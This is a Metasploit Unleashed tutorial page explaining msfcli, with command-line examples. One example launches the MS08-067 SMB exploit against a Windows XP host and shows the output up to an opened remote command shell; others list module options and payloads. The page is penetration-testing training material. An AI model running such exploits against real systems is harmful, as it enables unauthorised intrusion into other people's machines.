Msfcli
From Metasploit Unleashed
Msfcli provides a powerful command-line interface to the framework.
root@bt:~# msfcli -h Usage: /opt/framework/msf3/msfcli
Note that when using msfcli, variables are assigned using '=' and that all options are case-sensitive.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.100 PAYLOAD=windows/shell/bind_tcp E [*] Please wait while we load the module tree... _ _ / \ / \ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_ |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\ =[ metasploit v4.2.0-dev [core:4.2 api:1.0] + -- --=[ 775 exploits - 411 auxiliary - 120 post + -- --=[ 238 payloads - 27 encoders - 8 nops =[ svn r14414 updated today (2011.12.14) RHOST => 192.168.1.100 PAYLOAD => windows/shell/bind_tcp [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:Unknown [*] We could not detect the language pack, defaulting to English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.1.100 [*] Command shell session 1 opened (192.168.1.5:53482 -> 192.168.1.100:4444) at 2011-12-14 21:13:55 -0500 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
If you aren't entirely sure about what options belong to a particular module, you can append the letter 'O' to the end of the string at whichever point you are stuck.
root@bt:~# msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree... Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
To display the payloads that are available for the current module, append the letter 'P' to the command-line string.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.100 P [*] Please wait while we load the module tree... Compatible payloads =================== Name Description ---- ----------- generic/custom Use custom string or file as payload. Set either PAYLOADFILE or ...snip...
The other options available to msfcli are available by issuing 'msfcli -h'.
Benefits of mscli
- Supports the launching of exploits and auxiliary modules
- Useful for specific tasks
- Good for learning
- Convenient to use when testing or developing a new exploit
- Good tool for one-off exploitation
- Excellent if you know exactly which exploit and options you need
- Wonderful for use in scripts and basic automation
The only real drawback of msfcli is that it is not supported quite as well as msfconsole and it can only handle one shell at a time, making it rather impractical for client-side attacks. It also doesn't support any of the advanced automation features of msfconsole.
Metasploit Fundamentals > Msfcli
